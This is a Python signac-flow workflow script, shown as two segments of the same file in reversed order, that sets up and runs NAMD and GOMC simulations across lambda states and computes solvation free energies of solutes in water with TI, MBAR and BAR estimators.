    # from hot to cool to equilibrate the system.
    generate_namd_equilb_control_file(template_path_filename=namd_template_path_str,
                                      namd_path_conf_filename=namd_equilb_NPT_control_file_name_str,
                                      namd_path_file_output_names=namd_equilb_NPT_control_file_name_str,
                                      namd_uses_water=namd_uses_water,
                                      namd_water_model=namd_water_model,
                                      namd_electrostatics_bool=use_ElectroStatics,
                                      namd_vdw_geometric_sigma_bool=VDWGeometricSigma,
                                      namd_psf_path_filename=f"{mosdef_structure_box_0_name_str}.psf",
                                      namd_pdb_path_filename=f"{mosdef_structure_box_0_name_str}.pdb",
                                      namd_ff_path_filename=f"{namd_ff_filename_str}.inp",
                                      namd_production_temp_K= int(production_temperature_K),
                                      namd_production_pressure_bar=production_pressure_bar,
                                      electrostatic_1_4=namd_charmm_object_with_files.coul_1_4,
                                      non_bonded_cutoff=job.doc.Rcut_for_switch_namd_ang,
                                      non_bonded_switch_distance=job.doc.Rcut_ang,
                                      pairlist_distance=job.doc.neighbor_list_dist_namd_ang,
                                      box_lengths=box_lengths_ang,
                                      )
    print("#**********************")
    print("Completed: namd_equilb_NPT GOMC control file writing")
    print("#**********************")
    # ******************************************************
    # namd_equilb_NPT - psf, pdb, force field (FF) file writing and GOMC control file writing (end)
    # ******************************************************
    # ******************************************************
    # equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (start)
    # Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
    # so the Charmm object only needs created 1 time.
    # ******************************************************
    print("#**********************")
    print("Started: equilb NPT or GEMC-NVT GOMC control file writing")
    print("#**********************")
    # One equilibration + one production control file per lambda initial state.
    for initial_state_sims_i in list(job.doc.InitialState_list):
        # The GOMC equilibration restarts from the NAMD equilibration outputs.
        namd_restart_pdb_psf_file_name_str = mosdef_structure_box_0_name_str
        restart_control_file_name_str = namd_equilb_NPT_control_file_name_str
        output_name_control_file_name = "{}_initial_state_{}".format(
            gomc_equilb_design_ensemble_control_file_name_str, initial_state_sims_i
        )
        # Record restart/output names in the job doc so the run operations
        # can locate them later.
        job.doc.gomc_equilb_design_ensemble_dict.update(
            {
                initial_state_sims_i: {
                    "restart_control_file_name": restart_control_file_name_str,
                    "output_name_control_file_name": output_name_control_file_name,
                }
            }
        )
        # calc MC steps
        MC_steps = int(gomc_steps_equilb_design_ensemble)
        EqSteps = 1000
        # output all data and calc frequecy
        output_true_list_input = [
            True,
            int(gomc_output_data_every_X_steps),
        ]
        output_false_list_input = [
            False,
            int(gomc_output_data_every_X_steps),
        ]
        # MC move ratios for the supported solvent/solute combinations.
        # NOTE(review): the solute test reads job.doc.solute while other code
        # uses job.sp.solute — presumably the doc mirrors the statepoint; confirm.
        if job.doc.solvent in ["TIP4", "TIP3"] \
                and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
            used_ensemble = "NPT"
            if job.doc.production_ensemble in ["NVT", "NPT"]:
                VolFreq = (0.01,)
                MultiParticleFreq = (None,)
                IntraSwapFreq = (0.0,)
                CrankShaftFreq = (None,)
                SwapFreq = (None,)
                DisFreq = (0.39,)
                RotFreq = (0.3,)
                RegrowthFreq = (0.3,)
        else:
            raise ValueError(
                "Moleules MC move ratios not listed for this solvent and solute or ensemble "
                "in the GOMC control file writer."
            )
        # Restart inputs: psf/pdb from the MoSDeF build, coor/xsc from NAMD.
        Coordinates_box_0 = "{}.pdb".format(
            namd_restart_pdb_psf_file_name_str
        )
        Structure_box_0 = "{}.psf".format(
            namd_restart_pdb_psf_file_name_str
        )
        binCoordinates_box_0 = "{}.restart.coor".format(
            restart_control_file_name_str
        )
        extendedSystem_box_0 = "{}.restart.xsc".format(
            restart_control_file_name_str
        )
        gomc_control.write_gomc_control_file(
            gomc_charmm_object_with_files,
            output_name_control_file_name,
            used_ensemble,
            MC_steps,
            production_temperature_K,
            ff_psf_pdb_file_directory=None,
            check_input_files_exist=False,
            Parameters="{}.inp".format(gomc_ff_filename_str),
            Restart=True,
            RestartCheckpoint=True,
            ExpertMode=False,
            Coordinates_box_0=Coordinates_box_0,
            Structure_box_0=Structure_box_0,
            binCoordinates_box_0=binCoordinates_box_0,
            extendedSystem_box_0=extendedSystem_box_0,
            binVelocities_box_0=None,
            Coordinates_box_1=None,
            Structure_box_1=None,
            binCoordinates_box_1=None,
            extendedSystem_box_1=None,
            binVelocities_box_1=None,
            input_variables_dict={
                "PRNG": seed_no,
                "Pressure": production_pressure_bar,
                "Ewald": use_ElectroStatics,
                "ElectroStatic": use_ElectroStatics,
                "VDWGeometricSigma": VDWGeometricSigma,
                "Rcut": job.doc.Rcut_ang,
                "Exclude": Exclude,
                "VolFreq": VolFreq[-1],
                "MultiParticleFreq": MultiParticleFreq[-1],
                "IntraSwapFreq": IntraSwapFreq[-1],
                "CrankShaftFreq": CrankShaftFreq[-1],
                "SwapFreq": SwapFreq[-1],
                "DisFreq": DisFreq[-1],
                "RotFreq": RotFreq[-1],
                "RegrowthFreq": RegrowthFreq[-1],
                "OutputName": output_name_control_file_name,
                "EqSteps": EqSteps,
                "PressureCalc": output_false_list_input,
                "RestartFreq": output_true_list_input,
                "CheckpointFreq": output_true_list_input,
                "ConsoleFreq": output_true_list_input,
                "BlockAverageFreq": output_true_list_input,
                "HistogramFreq": output_false_list_input,
                "CoordinatesFreq": output_false_list_input,
                "DCDFreq": output_true_list_input,
                "Potential": cutoff_style,
                "LRC": True,
                "RcutLow": 0,
                "CBMC_First": 12,
                "CBMC_Nth": 10,
                "CBMC_Ang": 50,
                "CBMC_Dih": 50,
                "FreeEnergyCalc": FreeEnergyCalc,
                "MoleculeType": MoleculeType,
                "InitialState": initial_state_sims_i,
                "LambdaVDW": list(job.doc.LambdaVDW_list),
                # "LambdaCoulomb": None,
            },
        )
        print("#**********************")
        print("Completed: equilb NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
        # ******************************************************
        # equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (end)
        # Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
        # so the Charmm object only needs created 1 time.
        # ******************************************************
        # ******************************************************
        # production NPT or GEMC-NVT - GOMC control file writing (start)
        # ******************************************************
        print("#**********************")
        print("Started: production NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
        # The production run restarts from the equilibration run's
        # _BOX_0_restart outputs for this same initial state.
        output_name_control_file_name = "{}_initial_state_{}".format(
            gomc_production_control_file_name_str, initial_state_sims_i
        )
        restart_control_file_name_str = "{}_initial_state_{}".format(
            gomc_equilb_design_ensemble_control_file_name_str, int(initial_state_sims_i)
        )
        job.doc.gomc_production_run_ensemble_dict.update(
            {
                initial_state_sims_i: {
                    "restart_control_file_name": restart_control_file_name_str,
                    "output_name_control_file_name": output_name_control_file_name,
                }
            }
        )
        # calc MC steps
        MC_steps = int(gomc_steps_lamda_production)
        EqSteps = 1000
        # output all data and calc frequecy
        output_true_list_input = [
            True,
            int(gomc_output_data_every_X_steps),
        ]
        output_false_list_input = [
            False,
            int(gomc_output_data_every_X_steps),
        ]
        # Production move ratios: NVT disables volume moves, NPT uses 1%.
        if job.doc.solvent in ["TIP4", "TIP3"] \
                and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
            used_ensemble = job.doc.production_ensemble
            if job.doc.production_ensemble in ["NVT", "NPT"]:
                if job.doc.production_ensemble in ["NVT"]:
                    VolFreq = (0.00,)
                    MultiParticleFreq = (None,)
                    IntraSwapFreq = (0.0,)
                    CrankShaftFreq = (None,)
                    SwapFreq = (None,)
                    DisFreq = (0.4,)
                    RotFreq = (0.3,)
                    RegrowthFreq = (0.3,)
                elif job.doc.production_ensemble in ["NPT"]:
                    VolFreq = (0.01,)
                    MultiParticleFreq = (None,)
                    IntraSwapFreq = (0.0,)
                    CrankShaftFreq = (None,)
                    SwapFreq = (None,)
                    DisFreq = (0.39,)
                    RotFreq = (0.3,)
                    RegrowthFreq = (0.3,)
        else:
            raise ValueError(
                "Moleules MC move ratios not listed for this solvent and solute or ensemble "
                "in the GOMC control file writer."
            )
        Coordinates_box_0 = "{}_BOX_0_restart.pdb".format(
            restart_control_file_name_str
        )
        Structure_box_0 = "{}_BOX_0_restart.psf".format(
            restart_control_file_name_str
        )
        binCoordinates_box_0 = "{}_BOX_0_restart.coor".format(
            restart_control_file_name_str
        )
        extendedSystem_box_0 = "{}_BOX_0_restart.xsc".format(
            restart_control_file_name_str
        )
        gomc_control.write_gomc_control_file(
            gomc_charmm_object_with_files,
            output_name_control_file_name,
            used_ensemble,
            MC_steps,
            production_temperature_K,
            ff_psf_pdb_file_directory=None,
            check_input_files_exist=False,
            Parameters="{}.inp".format(gomc_ff_filename_str),
            Restart=True,
            RestartCheckpoint=True,
            ExpertMode=False,
            Coordinates_box_0=Coordinates_box_0,
            Structure_box_0=Structure_box_0,
            binCoordinates_box_0=binCoordinates_box_0,
            extendedSystem_box_0=extendedSystem_box_0,
            binVelocities_box_0=None,
            Coordinates_box_1=None,
            Structure_box_1=None,
            binCoordinates_box_1=None,
            extendedSystem_box_1=None,
            binVelocities_box_1=None,
            input_variables_dict={
                "PRNG": seed_no,
                "Pressure": production_pressure_bar,
                "Ewald": use_ElectroStatics,
                "ElectroStatic": use_ElectroStatics,
                "VDWGeometricSigma": VDWGeometricSigma,
                "Rcut": job.doc.Rcut_ang,
                "Exclude": Exclude,
                "VolFreq": VolFreq[-1],
                "MultiParticleFreq": MultiParticleFreq[-1],
                "IntraSwapFreq": IntraSwapFreq[-1],
                "CrankShaftFreq": CrankShaftFreq[-1],
                "SwapFreq": SwapFreq[-1],
                "DisFreq": DisFreq[-1],
                "RotFreq": RotFreq[-1],
                "RegrowthFreq": RegrowthFreq[-1],
                "OutputName": output_name_control_file_name,
                "EqSteps": EqSteps,
                "PressureCalc": output_false_list_input,
                "RestartFreq": output_true_list_input,
                "CheckpointFreq": output_true_list_input,
                "ConsoleFreq": output_true_list_input,
                "BlockAverageFreq": output_true_list_input,
                "HistogramFreq": output_false_list_input,
                "CoordinatesFreq": output_false_list_input,
                "DCDFreq": output_true_list_input,
                "Potential": cutoff_style,
                "LRC": True,
                "RcutLow": 0,
                "CBMC_First": 12,
                "CBMC_Nth": 10,
                "CBMC_Ang": 50,
                "CBMC_Dih": 50,
                "FreeEnergyCalc": FreeEnergyCalc,
                "MoleculeType": MoleculeType,
                "InitialState": initial_state_sims_i,
                "LambdaVDW": list(job.doc.LambdaVDW_list),
                #"LambdaCoulomb": None,
            },
        )
        print("#**********************")
        print("Completed: production NPT or GEMC-NVT GOMC control file writing")
        print("#**********************")
# ******************************************************
# production NPT or GEMC-NVT - GOMC control file writing (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (start)
# ******************************************************
# ******************************************************
@Project.pre(mosdef_input_written)
@Project.pre(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_3a_output_namd_equilb_NPT_started)
@Project.post(part_4a_job_namd_equilb_NPT_completed_properly)
@Project.operation.with_directives(
    {
        "np": lambda job: job.doc.namd_node_ncpu,
        "ngpu": lambda job: job.doc.namd_node_ngpu,
        "memory": memory_needed,
        "walltime": walltime_namd_hr,
    }
)
@flow.with_job
@flow.cmd
def run_namd_equilb_NPT_gomc_command(job):
    """Return the shell command that runs the namd_equilb_NPT simulation.

    flow.cmd executes the returned string inside the job workspace;
    stdout is redirected to out_<control file>.dat.
    """
    print("#**********************")
    print("# Started the run_namd_equilb_NPT_gomc_command.")
    print("#**********************")
    conf_name = namd_equilb_NPT_control_file_name_str
    print(f"Running simulation job id {job}")
    run_command = (
        f"{namd_binary_path}/{job.doc.namd_equilb_NPT_gomc_binary_file}"
        f" +p{job.doc.namd_node_ncpu}"
        f" {conf_name}.conf > out_{conf_name}.dat"
    )
    print(f"namd run_command = {run_command}")
    return run_command
# ******************************************************
# ******************************************************
# namd_equilb_NPT -starting the NAMD simulations (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
# Register one GOMC equilibration operation per lambda initial state.  The
# loop variable is frozen into each operation through the keyword-only
# default, sidestepping Python's late-binding closure pitfall.
for lambda_state in range(number_of_lambda_spacing_including_zero_int):
    @Project.pre(part_2a_namd_equilb_NPT_control_file_written)
    @Project.pre(part_4a_job_namd_equilb_NPT_completed_properly)
    @Project.post(part_3b_output_gomc_equilb_design_ensemble_started)
    @Project.post(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
    @Project.operation.with_directives(
        {
            "np": lambda job: job.doc.gomc_ncpu,
            "ngpu": lambda job: job.doc.gomc_ngpu,
            "memory": memory_needed,
            "walltime": walltime_gomc_equilbrium_hr,
        },
        name = f"gomc_equilb_design_ensemble_initial_state_{lambda_state}"
    )
    @flow.with_job
    @flow.cmd
    def run_equilb_run_gomc_command(job, *, initial_state_j=lambda_state):
        """Return the shell command that runs the gomc_equilb_run_ensemble simulation."""
        # Control-file name was recorded in the job doc by the writer operation.
        conf_name = job.doc.gomc_equilb_design_ensemble_dict[
            str(initial_state_j)
        ]["output_name_control_file_name"]
        print(f"Running simulation job id {job}")
        run_command = (
            f"{gomc_binary_path}/{job.doc.gomc_equilb_design_ensemble_gomc_binary_file}"
            f" +p{job.doc.gomc_ncpu}"
            f" {conf_name}.conf > out_{conf_name}.dat"
        )
        print(f"gomc equilbrium_run run_command = {run_command}")
        return run_command
# *****************************************
# ******************************************************
# equilb NPT - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (start)
# ******************************************************
# ******************************************************
# Register one GOMC production operation per lambda initial state; as above,
# the keyword-only default freezes the loop variable into the operation.
for lambda_state in range(number_of_lambda_spacing_including_zero_int):
    @Project.pre(part_2c_gomc_production_control_file_written)
    @Project.pre(part_4b_job_gomc_equilb_design_ensemble_completed_properly)
    @Project.post(part_part_3c_output_gomc_production_run_started)
    @Project.post(part_4c_job_production_run_completed_properly)
    @Project.operation.with_directives(
        {
            "np": lambda job: job.doc.gomc_ncpu,
            "ngpu": lambda job: job.doc.gomc_ngpu,
            "memory": memory_needed,
            "walltime": walltime_gomc_production_hr,
        },
        name = f"gomc_production_ensemble_initial_state_{lambda_state}"
    )
    @flow.with_job
    @flow.cmd
    def run_production_run_gomc_command(job, *, initial_state_i=lambda_state):
        """Return the shell command that runs the gomc_production_ensemble simulation."""
        # Control-file name was recorded in the job doc by the writer operation.
        conf_name = job.doc.gomc_production_run_ensemble_dict[
            str(initial_state_i)
        ]["output_name_control_file_name"]
        print(f"Running simulation job id {job}")
        run_command = (
            f"{gomc_binary_path}/{job.doc.gomc_production_ensemble_gomc_binary_file}"
            f" +p{job.doc.gomc_ncpu}"
            f" {conf_name}.conf > out_{conf_name}.dat"
        )
        print(f"gomc production run_command = {run_command}")
        return run_command
# ******************************************************
# ******************************************************
# production run - starting the GOMC simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (start)
# ******************************************************
# ******************************************************
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_gomc_analysis_hr,
    }
)
@FlowProject.pre(
    lambda *jobs: all(
        part_4c_job_production_run_completed_properly(job)
        for job in jobs
    )
)
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.post(part_5a_analysis_individual_simulation_averages_completed)
@flow.with_job
def part_5a_analysis_individual_simulation_averages(*jobs):
    """Compute per-replicate solvation free energies (TI, MBAR, BAR) and write them.

    For each job, the per-lambda-state Free_Energy output files from the
    production runs are parsed with alchemlyb and reduced to single
    free-energy estimates (kcal/mol), which are written to a fixed-width
    text file inside the job workspace.
    """
    # remove the total averaged replicate data and all analysis data after this,
    # as it is no longer valid when adding more simulations
    if os.path.isfile(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'):
        os.remove(f'../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}')
    output_column_temp_title = 'temp_K'  # column title for temp
    output_column_solute_title = 'solute'  # column title for the solute
    output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol'  # column title for delta_MBAR
    output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol'  # column title for ds_MBAR
    output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol'  # column title for delta_TI
    output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol'  # column title for ds_TI
    output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol'  # column title for delta_BAR
    output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol'  # column title for ds_BAR
    # get the averages from each individual simulation and write the csv's.
    for job in jobs:
        files = []
        k_b = 1.9872036E-3  # Boltzmann constant in kcal/(mol*K)
        temperature = job.sp.production_temperature_K
        k_b_T = temperature * k_b
        # Collect one free-energy output file per lambda initial state.
        for initial_state_iter in range(0, number_of_lambda_spacing_including_zero_int):
            reading_filename_box_0_iter = f'Free_Energy_BOX_0_{gomc_production_control_file_name_str}_' \
                                          f'initial_state_{initial_state_iter}.dat'
            files.append(reading_filename_box_0_iter)
        # for TI estimator
        dHdl = pd.concat([extract_dHdl(job.fn(f), T=temperature) for f in files])
        ti = TI().fit(dHdl)
        delta_ti, delta_std_ti = get_delta_TI_or_MBAR(ti, k_b_T)
        # for MBAR estimator
        u_nk = pd.concat([extract_u_nk(job.fn(f), T=temperature) for f in files])
        mbar = MBAR().fit(u_nk)
        delta_mbar, delta_std_mbar = get_delta_TI_or_MBAR(mbar, k_b_T)
        # for BAR estimator (reuses the u_nk matrix built for MBAR)
        bar = BAR().fit(u_nk)
        delta_bar, delta_std_bar = get_delta_BAR(bar, k_b_T)
        # write the data out in each job
        # FIX: use a context manager so the file handle is always closed
        # (it was previously opened and never closed).
        with open(job.fn(output_replicate_txt_file_name_box_0), "w") as box_0_replicate_data_txt_file:
            box_0_replicate_data_txt_file.write(
                f"{output_column_temp_title: <30} "
                f"{output_column_solute_title: <30} "
                f"{output_column_dFE_MBAR_title: <30} "
                f"{output_column_dFE_MBAR_std_title: <30} "
                f"{output_column_dFE_TI_title: <30} "
                f"{output_column_dFE_TI_std_title: <30} "
                f"{output_column_dFE_BAR_title: <30} "
                f"{output_column_dFE_BAR_std_title: <30} "
                f" \n"
            )
            box_0_replicate_data_txt_file.write(
                f"{job.sp.production_temperature_K: <30} "
                f"{job.sp.solute: <30} "
                f"{delta_mbar: <30} "
                f"{delta_std_mbar: <30} "
                f"{delta_ti: <30} "
                f"{delta_std_ti: <30} "
                f"{delta_bar: <30} "
                f"{delta_std_bar: <30} "
                f" \n"
            )
# ******************************************************
# ******************************************************
# data analysis - get the average data from each individual simulation (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (start)
# ******************************************************
# ******************************************************
@aggregator.groupby(key=statepoint_without_replica,
                    sort_by="production_temperature_K",
                    sort_ascending=True
                    )
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_gomc_analysis_hr,
    }
)
@Project.pre(lambda *jobs: all(part_5a_analysis_individual_simulation_averages_completed(j)
                               for j in jobs[0]._project))
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.post(part_5b_analysis_replica_averages_completed)
def part_5b_analysis_replica_averages(*jobs):
    """Average the per-replicate free-energy results across replicates.

    Reads each replicate's box-0 results file, computes the mean and
    sample standard deviation (ddof=1) of the MBAR, TI, and BAR free
    energies, and appends one row per statepoint group to the shared
    analysis output file.
    """
    # ***************************************************
    # create the required lists and file labels for the replicates (start)
    # ***************************************************
    # output and labels
    output_column_temp_title = 'temp_K'  # column title for temp
    output_column_temp_std_title = 'temp_std_K'  # column title for temp std. dev.
    output_column_solute_title = 'solute'  # column title for the solute
    output_column_dFE_MBAR_title = 'dFE_MBAR_kcal_per_mol'  # column title for delta_MBAR
    output_column_dFE_MBAR_std_title = 'dFE_MBAR_std_kcal_per_mol'  # column title for ds_MBAR
    output_column_dFE_TI_title = 'dFE_TI_kcal_per_mol'  # column title for delta_TI
    output_column_dFE_TI_std_title = 'dFE_TI_std_kcal_per_mol'  # column title for ds_TI
    output_column_dFE_BAR_title = 'dFE_BAR_kcal_per_mol'  # column title for delta_BAR
    output_column_dFE_BAR_std_title = 'dFE_BAR_std_kcal_per_mol'  # column title for ds_BAR
    # get the list used in this function
    temp_repilcate_list = []
    solute_repilcate_list = []
    delta_MBAR_repilcate_box_0_list = []
    delta_TI_repilcate_box_0_list = []
    delta_BAR_repilcate_box_0_list = []
    # FIX: the TI-title field below used the format spec '<3 0', which is
    # invalid and raised ValueError at runtime; corrected to '<30'.
    output_txt_file_header = f"{output_column_temp_title: <30} " \
                             f"{output_column_temp_std_title: <30} " \
                             f"{output_column_solute_title: <30} "\
                             f"{output_column_dFE_MBAR_title: <30} "\
                             f"{output_column_dFE_MBAR_std_title: <30} "\
                             f"{output_column_dFE_TI_title: <30} "\
                             f"{output_column_dFE_TI_std_title: <30} "\
                             f"{output_column_dFE_BAR_title: <30} "\
                             f"{output_column_dFE_BAR_std_title: <30} "\
                             f"\n"
    write_file_path_and_name_box_0 = f'analysis/{output_avg_std_of_replicates_txt_file_name_box_0}'
    # Append when the file already exists; otherwise create it with a header.
    if os.path.isfile(write_file_path_and_name_box_0):
        box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "a")
    else:
        box_box_0_data_txt_file = open(write_file_path_and_name_box_0, "w")
        box_box_0_data_txt_file.write(output_txt_file_header)
    # ***************************************************
    # create the required lists and file labels for the replicates (end)
    # ***************************************************
    for job in jobs:
        # *************************
        # drawing in data from single file and extracting specific rows from box 0 (start)
        # *************************
        reading_file_box_box_0 = job.fn(output_replicate_txt_file_name_box_0)
        data_box_box_0 = pd.read_csv(reading_file_box_box_0, sep=r'\s+', header=0, na_values='NaN', index_col=False)
        data_box_box_0 = pd.DataFrame(data_box_box_0)
        temp_repilcate_list.append(data_box_box_0.loc[:, output_column_temp_title][0])
        solute_repilcate_list.append(data_box_box_0.loc[:, output_column_solute_title][0])
        delta_MBAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_MBAR_title][0])
        delta_TI_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_TI_title][0])
        delta_BAR_repilcate_box_0_list.append(data_box_box_0.loc[:, output_column_dFE_BAR_title][0])
        # *************************
        # drawing in data from single file and extracting specific rows from box 0 (end)
        # *************************
    # *************************
    # get the replica means and std.devs (start)
    # *************************
    temp_mean = np.mean(temp_repilcate_list)
    temp_std = np.std(temp_repilcate_list, ddof=1)
    solute_iter = solute_repilcate_list[0]
    delta_MBAR_mean_box_box_0 = np.mean(delta_MBAR_repilcate_box_0_list)
    delta_TI_mean_box_box_0 = np.mean(delta_TI_repilcate_box_0_list)
    delta_BAR_mean_box_box_0 = np.mean(delta_BAR_repilcate_box_0_list)
    delta_std_MBAR_mean_box_box_0 = np.std(delta_MBAR_repilcate_box_0_list, ddof=1)
    delta_std_TI_mean_box_box_0 = np.std(delta_TI_repilcate_box_0_list, ddof=1)
    delta_std_BAR_mean_box_box_0 = np.std(delta_BAR_repilcate_box_0_list, ddof=1)
    # *************************
    # get the replica means and std.devs (end)
    # *************************
    # ************************************
    # write the analysis data files for the liquid and vapor boxes (start)
    # ************************************
    box_box_0_data_txt_file.write(
        f"{temp_mean: <30} "
        f"{temp_std: <30} "
        f"{solute_iter: <30} "
        f"{delta_MBAR_mean_box_box_0: <30} "
        f"{delta_std_MBAR_mean_box_box_0: <30} "
        f"{delta_TI_mean_box_box_0: <30} "
        f"{delta_std_TI_mean_box_box_0: <30} "
        f"{delta_BAR_mean_box_box_0: <30} "
        f"{delta_std_BAR_mean_box_box_0: <30} "
        f" \n"
    )
    # FIX: close the output file (it was previously left open).
    box_box_0_data_txt_file.close()
    # ************************************
    # write the analysis data files for the liquid and vapor boxes (end)
    # ************************************
# ************************************
# write the analysis data files for the liquid and vapor boxes (end)
# ************************************
# ******************************************************
# ******************************************************
# data analysis - get the average and std. dev. from/across all the replicates (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# signac end code (start)
# ******************************************************
# ******************************************************
if __name__ == "__main__":
    # Entry point: hand control to signac-flow's CLI (status/run/submit/exec).
    pr = Project()
    pr.main()
# ******************************************************
# ******************************************************
# signac end code (end)
# ******************************************************
# ******************************************************
| """GOMC's setup for signac, signac-flow, signac-dashboard for this study."""
# project.py
import flow
# from flow.environment import StandardEnvironment
import mbuild as mb
import mbuild.formats.charmm_writer as mf_charmm
import mbuild.formats.gomc_conf_writer as gomc_control
import numpy as np
from alchemlyb.parsing.gomc import extract_dHdl, extract_u_nk
from alchemlyb.estimators import MBAR, BAR, TI
import alchemlyb.preprocessing.subsampling as ss
import pandas as pd
import numpy as np
import os
import unyt as u
from flow import FlowProject, aggregator
from flow.environment import DefaultSlurmEnvironment
from src.utils.forcefields import get_ff_path
from src.utils.forcefields import get_molecule_path
from templates.NAMD_conf_template import generate_namd_equilb_control_file
class Project(FlowProject):
    """FlowProject subclass for this GOMC solvation free-energy study."""

    def __init__(self):
        # No extra state is kept here; defer entirely to FlowProject's setup.
        super().__init__()
class Grid(DefaultSlurmEnvironment):  # Grid(StandardEnvironment):
    """Environment profile for WSU's Grid cluster (Slurm scheduler)."""

    # Submission-script template used for this cluster.
    template = "grid.sh"
    # Hosts matching this regex auto-select the Grid environment.
    hostname_pattern = r".*\.grid\.wayne\.edu"
# ******************************************************
# users typical variables, but not all (start)
# ******************************************************
# Paths to the GOMC and NAMD binaries (the bin folder). If the binaries are
# directly callable from the terminal, use an empty string ("" or '').
# WSU grid binary paths
gomc_binary_path = "/wsu/home/go/go24/go2432/wolf/GOMC/bin"
namd_binary_path = "/wsu/home/go/go24/go2432/NAMD_2.14_Linux-x86_64-multicore-CUDA"
# brads workstation binary paths
#gomc_binary_path = "/home/brad/Programs/GOMC/GOMC_dev_1_21_22/bin"
#namd_binary_path = "/home/brad/Programs/NAMD/NAMD_2.14_RTX_3080_build_Source_CUDA"
# simulation step counts and output frequencies (values used in the paper noted inline)
gomc_steps_equilb_design_ensemble = 10 * 10**6 # set value for paper = 10 * 10**6
gomc_steps_lamda_production = 50 * 10**6 # set value for paper = 50 * 10**6
gomc_output_data_every_X_steps = 100 * 10**3 # set value for paper = 100 * 10**3
gomc_free_energy_output_data_every_X_steps = 10 * 10**3 # set value for paper = 10 * 10**3
# Free energy calcs: number of lambda points (including the 0 and 1 endpoints)
# used to generate the lambda schedule stored in each job's doc.
number_of_lambda_spacing_including_zero_int = 11
# force field (FF) file basenames for all simulations in a job (no extensions)
namd_ff_filename_str = "in_namd_FF"
gomc_ff_filename_str = "in_gomc_FF"
# initial mosdef structure/coordinate file basename (no extension)
mosdef_structure_box_0_name_str = "mosdef_box_0"
# NAMD NPT equilibration control-file / output basename (no extension)
namd_equilb_NPT_control_file_name_str = "namd_equilb_NPT"
# GOMC equilibration (design ensemble) control-file / output basename (no extension)
gomc_equilb_design_ensemble_control_file_name_str = "gomc_equilb_design_ensemble"
# GOMC production-run control-file / output basename (no extension)
gomc_production_control_file_name_str = "gomc_production_run"
# Analysis output: per-replicate averages file, written inside each replicate folder
output_replicate_txt_file_name_box_0 = "analysis_avg_data_box_0.txt"
# Analysis output: averages and std. devs. across all replicates
output_avg_std_of_replicates_txt_file_name_box_0 = "analysis_avg_std_of_replicates_box_0.txt"
# scheduler walltimes (hours) and memory (GB) for the cluster template
walltime_mosdef_hr = 24
walltime_namd_hr = 24
walltime_gomc_equilbrium_hr = 72
walltime_gomc_production_hr = 368
walltime_gomc_analysis_hr = 4
memory_needed = 16
# residue name -> force field xml filename
forcefield_residue_to_ff_filename_dict = {
    "TIP4": "tip4p_2005.xml",
    "Ne": "nobel_gas_vrabec_LB_mixing.xml",
    "Rn": "nobel_gas_vrabec_LB_mixing.xml",
    "ETOH": "trappe-ua.xml",
}
# residue name -> .mol2 filename or smiles string
smiles_or_mol2_name_to_value_dict = {
    "TIP4": 'tip4p.mol2',
    "Ne": "Ne",
    "Rn": "Rn",
    "ETOH": "ethanol.mol2"
}
# Resolve each residue's molecule definition via get_molecule_path():
# element [0] is stored under "use_smiles" and element [1] under
# "smiles_or_mol2" (both are later fed to mb.load).
smiles_or_mol2 = {
    str(residue_iter): {
        "use_smiles": get_molecule_path(
            str(smiles_or_mol2_name_to_value_dict[str(residue_iter)]))[0],
        "smiles_or_mol2": get_molecule_path(
            str(smiles_or_mol2_name_to_value_dict[str(residue_iter)]))[1],
    }
    for residue_iter in list(smiles_or_mol2_name_to_value_dict.keys())
}
# Resolve each residue's force field xml path.
forcefield_dict = {
    str(residue_iter): get_ff_path(
        forcefield_residue_to_ff_filename_dict[str(residue_iter)])
    for residue_iter in list(forcefield_residue_to_ff_filename_dict.keys())
}
print("*********************")
print("*********************")
print("smiles_or_mol2 = " + str(smiles_or_mol2))
print("forcefield_dict = " + str(forcefield_dict))
print("*********************")
print("*********************")
# ******************************************************
# users typical variables, but not all (end)
# ******************************************************
# ******************************************************
# signac and GOMC-MOSDEF code (start)
# ******************************************************
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (start).
# ******************************************************
# ******************************************************
# set the default directory
project_directory_path = str(os.getcwd())
print("project_directory_path = " + str(project_directory_path))
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (start)
# ******************************************************
# ******************************************************
